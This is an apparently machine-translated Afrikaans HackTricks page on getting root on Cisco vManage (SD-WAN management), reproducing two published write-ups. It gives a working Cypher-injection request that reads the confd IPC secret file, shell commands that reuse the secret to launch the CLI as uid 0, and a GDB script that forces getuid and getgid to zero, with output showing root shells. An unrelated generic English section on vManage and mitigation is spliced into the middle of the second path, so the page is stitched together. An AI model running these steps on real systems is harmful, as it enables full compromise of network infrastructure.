Cisco - vmanage

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die SUBSCRIPTION PLANS!
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Kry die amptelike PEASS & HackTricks swag
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die hacktricks-repo en hacktricks-cloud-repo.

Pad 1

(Voorbeeld van https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)

Nadat ons 'n bietjie deur 'n paar dokumentasie gekrap het wat verband hou met confd en die verskillende binnerwerke (toeganklik met 'n rekening op die Cisco-webwerf), het ons gevind dat dit 'n geheim gebruik wat in /etc/confd/confd_ipc_secret geleë is om die IPC-aansluiting te verifieer:

vmanage:~$ ls -al /etc/confd/confd_ipc_secret

-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret

Onthou ons Neo4j-instantie? Dit word uitgevoer onder die voorregte van die vmanage-gebruiker, wat ons in staat stel om die lêer te herwin deur gebruik te maak van die vorige kwesbaarheid:

GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1

Host: vmanage-XXXXXX.viptela.net



[...]

"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}

Die confd_cli program ondersteun nie opdraglyn-argumente nie, maar roep /usr/bin/confd_cli_user aan met argumente. So, ons kan direk /usr/bin/confd_cli_user oproep met ons eie stel argumente. Tog is dit nie leesbaar met ons huidige bevoegdhede nie, so ons moet dit van die rootfs herwin en dit gebruik om dit met behulp van scp te kopieer, die hulp lees en dit gebruik om die skul te kry:

vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret

vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret

vManage:~$ /tmp/confd_cli_user -U 0 -G 0

Welcome to Viptela CLI

admin connected from 127.0.0.1 using console on vManage

vManage# vshell

vManage:~# id

uid=0(root) gid=0(root) groups=0(root)

Pad 2

(Voorbeeld van https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)

Die blog¹ deur die synacktiv-span het 'n elegante manier beskryf om 'n root-skulp te kry, maar die addertjie is dat dit 'n kopie van die /usr/bin/confd_cli_user vereis wat slegs deur root leesbaar is. Ek het 'n ander manier gevind om na root te eskaleer sonder so 'n gedoente.

Toe ek die /usr/bin/confd_cli binêre kode ontleed het, het ek die volgende waargeneem:

vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3              mov    %rax,%rbx
40165f: bf 1c 31 40 00        mov    $0x40311c,%edi
401664: e8 17 f8 ff ff        callq  400e80 <getenv@plt>
401669: 49 89 c4              mov    %rax,%r12
40166c: 48 85 db              test   %rbx,%rbx
40166f: b8 dc 30 40 00        mov    $0x4030dc,%eax
401674: 48 0f 44 d8           cmove  %rax,%rbx
401678: 4d 85 e4              test   %r12,%r12
40167b: b8 e6 30 40 00        mov    $0x4030e6,%eax
401680: 4c 0f 44 e0           cmove  %rax,%r12
401684: e8 b7 f8 ff ff        callq  400f40 <getuid@plt>  <-- HERE
401689: 89 85 50 e8 ff ff     mov    %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff        callq  401000 <getgid@plt>  <-- HERE
401694: 89 85 44 e8 ff ff     mov    %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff     mov    -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff        callq  401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00  movb   $0x0,-0x831(%rbp)
4016ac: 48 85 c0              test   %rax,%rax
4016af: 0f 84 ad 03 00 00     je     401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00        mov    $0x3ff,%edx
4016ba: 48 89 c6              mov    %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff  lea    -0xc30(%rbp),%rdi
4016c4:   e8 d7 f7 ff ff           callq  400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …

Wanneer ek "ps aux" uitvoer, het ek die volgende waargeneem (note -g 100 -u 107)

vmanage:~$ ps aux
… snipped …
root     28644  0.0  0.0   8364   652 ?        Ss   18:06   0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …

Ek het vermoed dat die "confd_cli" program die gebruikers-ID en groep-ID wat dit van die ingelogde gebruiker versamel het, aan die "cmdptywrapper" toepassing deurgee.

My eerste poging was om die "cmdptywrapper" direk uit te voer en dit te voorsien met -g 0 -u 0, maar dit het misluk. Dit blyk dat 'n lêerbeskrywer (-i 1015) êrens langs die pad geskep is en ek kan dit nie vervals nie.

Soos genoem in synacktiv se blog (laaste voorbeeld), ondersteun die confd_cli program nie opdraglynargumente nie, maar ek kan dit beïnvloed met 'n debugger en gelukkig is GDB ingesluit op die stelsel.

Ek het 'n GDB-skripsie geskep waar ek die API getuid en getgid gedwing het om 0 terug te gee. Aangesien ek reeds "vmanage"-bevoegdheid het deur die deserialisering RCE, het ek toestemming om die /etc/confd/confd_ipc_secret direk te lees.

root.gdb:

set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run

Cisco vManage

Introduction

Cisco vManage is a cloud-based network management platform that provides centralized control and visibility for Cisco SD-WAN deployments. It allows network administrators to monitor and configure network devices, troubleshoot issues, and manage network policies.

Privilege Escalation

Privilege escalation refers to the process of gaining higher levels of access or privileges on a system or network. In the context of Cisco vManage, privilege escalation can allow an attacker to gain administrative access to the platform, potentially compromising the entire SD-WAN deployment.

Exploiting Vulnerabilities

To escalate privileges in Cisco vManage, an attacker can exploit vulnerabilities in the platform or its underlying components. This can include exploiting misconfigurations, weak passwords, or software vulnerabilities.

Mitigation

To mitigate the risk of privilege escalation in Cisco vManage, it is important to follow security best practices. This includes:

Regularly updating the platform and its components with the latest security patches.
Enforcing strong password policies and using multi-factor authentication.
Implementing network segmentation to limit the impact of a potential compromise.
Monitoring the platform for any suspicious activity or unauthorized access attempts.

By following these best practices, organizations can reduce the risk of privilege escalation and enhance the security of their Cisco SD-WAN deployments.

vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#